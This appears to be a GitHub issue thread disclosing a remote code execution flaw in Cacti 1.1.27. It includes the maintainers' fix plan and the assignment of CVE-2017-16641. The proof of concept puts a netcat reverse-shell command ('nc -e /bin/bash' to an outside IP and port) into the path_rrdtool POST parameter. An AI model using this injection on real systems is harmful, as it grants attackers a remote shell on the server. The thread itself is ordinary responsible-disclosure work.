Critical vuln in cacti 1.1.27

Question

Critical vuln in cacti 1.1.27

cibvetr2 opened this issue 7 years ago · comments

We (worlak2 and cibvetr2) found RCE vuln with black-box fuzzing.
PoC
1)Send in POST parameter path_rrdtool -> nc -e /bin/bash 192.168.1.214 1337 #

2) Ater 2-5 minutes we have backconnect shell

It’s triggered after execute poller.php in process. We think that because $command not filtered in ./lib/rrd.php:39-40

With regards worlak2 and cibvetr2

Jimmy Conner · Answer 1 · Sat Nov 04 2017 20:44:30 GMT+0800 (China Standard Time)

We will address this using two techniques. The first will be to conduct validation on the two form types: dirpath, and filepath. If, for these two form types, either the directory does not exist, or the file does not exist, the save will be rejected.

Then, as you mentioned, in the case where for some reason a Cacti admin has intentionally added a back door, or some SQL injection has allowed this modification, we will pre-check the path as you described.

Jimmy Conner · Answer 2 · Sat Nov 04 2017 21:19:19 GMT+0800 (China Standard Time)

Resolved, and thanks for reporting! We really appreciate those who comb the Cacti code for potential exploits.

cibvetr2 · Answer 3 · Sun Nov 05 2017 18:23:54 GMT+0800 (China Standard Time)

Thanks for answer, but we think thats need to enumerate of CVE

Tony Roman · Answer 4 · Sun Nov 05 2017 22:13:17 GMT+0800 (China Standard Time)

Is there a open CVE for this issue? If not, please submit your findings and get us a CVE.

limbo · Answer 5 · Mon Nov 06 2017 02:00:09 GMT+0800 (China Standard Time)

We didn't open CVE for this issue. We will send shortly

cibvetr2 · Answer 6 · Wed Nov 08 2017 03:20:38 GMT+0800 (China Standard Time)

Use CVE-2017-16641

DavidLiedke · Answer 7 · Sat Nov 11 2017 20:07:40 GMT+0800 (China Standard Time)

@ronytomen now it can be closed